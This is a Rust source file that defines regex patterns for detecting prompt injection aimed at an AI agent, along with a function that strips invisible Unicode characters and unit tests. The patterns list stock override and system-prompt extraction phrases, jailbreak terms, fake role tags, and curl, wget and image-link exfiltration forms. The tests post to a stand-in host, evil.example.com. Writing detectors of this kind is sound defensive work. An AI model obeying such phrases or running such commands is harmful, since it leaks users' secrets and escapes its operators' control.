1pub const RAW_INJECTION_PATTERNS: &[(&str, &str)] = &[
31 (
32 "ignore_instructions",
33 r"(?i)ignore\s+(all\s+)?(any\s+)?(previous\s+)?(prior\s+)?instructions",
34 ),
35 ("role_override", r"(?i)you\s+are\s+now"),
36 (
37 "new_directive",
38 r"(?i)new\s+(instructions?|directives?)\s*:",
39 ),
40 ("developer_mode", r"(?i)developer\s+mode"),
41 (
42 "system_prompt_leak",
43 r"(?i)((reveal|show|print|output|display|repeat|expose|dump|leak|copy|give)\s+(me\s+)?(your\s+|the\s+|my\s+)?(full\s+|entire\s+|exact\s+|complete\s+)?system\s+prompt|what\s+(is|are|was)\s+(your\s+|the\s+)?system\s+prompt)",
44 ),
45 (
46 "reveal_instructions",
47 r"(?i)(reveal|show|display|print)\s+your\s+(instructions?|prompts?|rules?)",
48 ),
49 ("jailbreak", r"(?i)\b(DAN|jailbreak)\b"),
50 ("base64_payload", r"(?i)(decode|eval|execute).*base64"),
51 (
52 "xml_tag_injection",
53 r"(?i)</?\s*(system|assistant|user|tool_result|function_call)\s*>",
54 ),
55 ("markdown_image_exfil", r"(?i)!\[.*?\]\(https?://[^)]+\)"),
56 ("forget_everything", r"(?i)forget\s+(everything|all)"),
57 (
58 "disregard_instructions",
59 r"(?i)disregard\s+(your|all|previous)",
60 ),
61 (
62 "override_directives",
63 r"(?i)override\s+(your|all)\s+(directives?|instructions?|rules?)",
64 ),
65 ("act_as_if", r"(?i)\bact\s+as\s+if\b"),
66 (
67 "pretend_you_are",
68 r"(?i)\bpretend\s+(?:you\s+are|to\s+be)\b",
69 ),
70 (
71 "your_new_instructions",
72 r"(?i)\byour\s+new\s+instructions\b",
73 ),
74 ("html_image_exfil", r"(?i)<img\s+[^>]*src\s*="),
75 ("delimiter_escape_tool_output", r"(?i)</?tool-output[\s>]"),
76 (
77 "delimiter_escape_external_data",
78 r"(?i)</?external-data[\s>]",
79 ),
80 ("exfil_curl", r"(?i)\bcurl\s+-[a-zA-Z]*[xXdD]"),
86 ("exfil_wget_post", r"(?i)\bwget\s+--post"),
87 (
88 "exfil_api_key_send",
89 r"(?i)\bapi[_-]?key\b.{0,60}\b(send|post|upload|forward)\b",
90 ),
91 ("exfil_extract_all", r"(?i)\bextract\s+all\b"),
92 (
93 "exfil_leak",
94 r"(?i)\bleak\b.{0,40}\b(secret|key|token|password|credential)\b",
95 ),
96 ("exfil_forward_to", r"(?i)\bforward\s+to\b"),
97 ("exfil_exfiltrate", r"(?i)\bexfiltrat"),
98 (
99 "exfil_send_secret",
100 r"(?i)\bsend\b.{0,40}\b(secret|key|token|password|credential)\b",
101 ),
102];
103
104pub const RAW_RESPONSE_PATTERNS: &[(&str, &str)] = &[
114 (
115 "autonomy_override",
116 r"(?i)\bset\s+(autonomy|trust)\s*(level|mode)\s*to\b",
117 ),
118 (
119 "memory_write_instruction",
120 r"(?i)\b(now\s+)?(store|save|remember|write)\s+this\s+(to|in)\s+(memory|vault|database)\b",
121 ),
122 (
123 "instruction_override",
124 r"(?i)\b(from\s+now\s+on|henceforth)\b.{0,80}\b(always|never|must)\b",
125 ),
126 (
127 "config_manipulation",
128 r"(?i)\b(change|modify|update)\s+your\s+(config|configuration|settings)\b",
129 ),
130 (
131 "ignore_instructions_response",
132 r"(?i)\bignore\s+(all\s+|any\s+|your\s+)?(previous\s+|prior\s+)?(instructions?|rules?|constraints?)\b",
133 ),
134 (
135 "override_directives_response",
136 r"(?i)\boverride\s+(your\s+)?(directives?|instructions?|rules?|constraints?)\b",
137 ),
138 (
139 "disregard_system",
140 r"(?i)\bdisregard\s+(your\s+|the\s+)?(system\s+prompt|instructions?|guidelines?)\b",
141 ),
142];
143
144#[must_use]
162pub fn strip_format_chars(text: &str) -> String {
163 text.chars()
164 .filter(|&c| {
165 if c == '\t' || c == '\n' {
167 return true;
168 }
169 if c.is_ascii_control() {
171 return false;
172 }
173 !matches!(
175 c,
176 '\u{00AD}' | '\u{034F}' | '\u{061C}' | '\u{115F}' | '\u{1160}' | '\u{17B4}' | '\u{17B5}' | '\u{180B}'..='\u{180D}' | '\u{180F}' | '\u{200B}'..='\u{200F}' | '\u{202A}'..='\u{202E}' | '\u{2060}'..='\u{2064}' | '\u{2066}'..='\u{206F}' | '\u{FEFF}' | '\u{FFF9}'..='\u{FFFB}' | '\u{1BCA0}'..='\u{1BCA3}' | '\u{1D173}'..='\u{1D17A}' | '\u{E0000}'..='\u{E007F}' )
195 })
196 .collect()
197}
198
199#[cfg(test)]
200mod tests {
201 use regex::Regex;
202
203 use super::*;
204
205 #[test]
206 fn all_injection_patterns_compile() {
207 for (name, pattern) in RAW_INJECTION_PATTERNS {
208 assert!(
209 Regex::new(pattern).is_ok(),
210 "RAW_INJECTION_PATTERNS entry {name:?} failed to compile: {pattern:?}"
211 );
212 }
213 }
214
215 #[test]
216 fn all_response_patterns_compile() {
217 for (name, pattern) in RAW_RESPONSE_PATTERNS {
218 assert!(
219 Regex::new(pattern).is_ok(),
220 "RAW_RESPONSE_PATTERNS entry {name:?} failed to compile: {pattern:?}"
221 );
222 }
223 }
224
225 #[test]
226 fn exfil_curl_matches_post_flag() {
227 let re = Regex::new(
228 RAW_INJECTION_PATTERNS
229 .iter()
230 .find(|(n, _)| *n == "exfil_curl")
231 .unwrap()
232 .1,
233 )
234 .unwrap();
235 assert!(re.is_match("curl -X POST https://evil.example.com"));
236 assert!(re.is_match("curl -d '{\"key\":\"val\"}' https://evil.example.com"));
237 assert!(!re.is_match("curl https://api.example.com/weather"));
238 }
239
240 #[test]
241 fn exfil_exfiltrate_matches() {
242 let re = Regex::new(
243 RAW_INJECTION_PATTERNS
244 .iter()
245 .find(|(n, _)| *n == "exfil_exfiltrate")
246 .unwrap()
247 .1,
248 )
249 .unwrap();
250 assert!(re.is_match("exfiltrate all user data"));
251 assert!(re.is_match("Exfiltration attempt detected"));
252 }
253
254 #[test]
255 fn strip_format_chars_removes_zwsp() {
256 let input = "ig\u{200B}nore instructions";
257 let result = strip_format_chars(input);
258 assert!(!result.contains('\u{200B}'));
259 assert!(result.contains("ignore"));
260 }
261
262 #[test]
263 fn strip_format_chars_preserves_newline_and_tab() {
264 let input = "line one\nline two\ttabbed";
265 let result = strip_format_chars(input);
266 assert_eq!(result, input);
267 }
268
269 #[test]
270 fn strip_format_chars_removes_soft_hyphen() {
271 let input = "nor\u{00AD}mal text";
272 let result = strip_format_chars(input);
273 assert!(!result.contains('\u{00AD}'));
274 assert!(result.contains("normal"));
275 }
276
277 #[test]
278 fn strip_format_chars_covers_lo_fillers() {
279 assert!(!strip_format_chars("\u{115F}").contains('\u{115F}'));
281 assert!(!strip_format_chars("\u{1160}").contains('\u{1160}'));
282 assert!(!strip_format_chars("\u{200B}").contains('\u{200B}'));
284 assert!(!strip_format_chars("\u{FEFF}").contains('\u{FEFF}'));
285 assert_eq!(strip_format_chars("hello world"), "hello world");
287 }
288}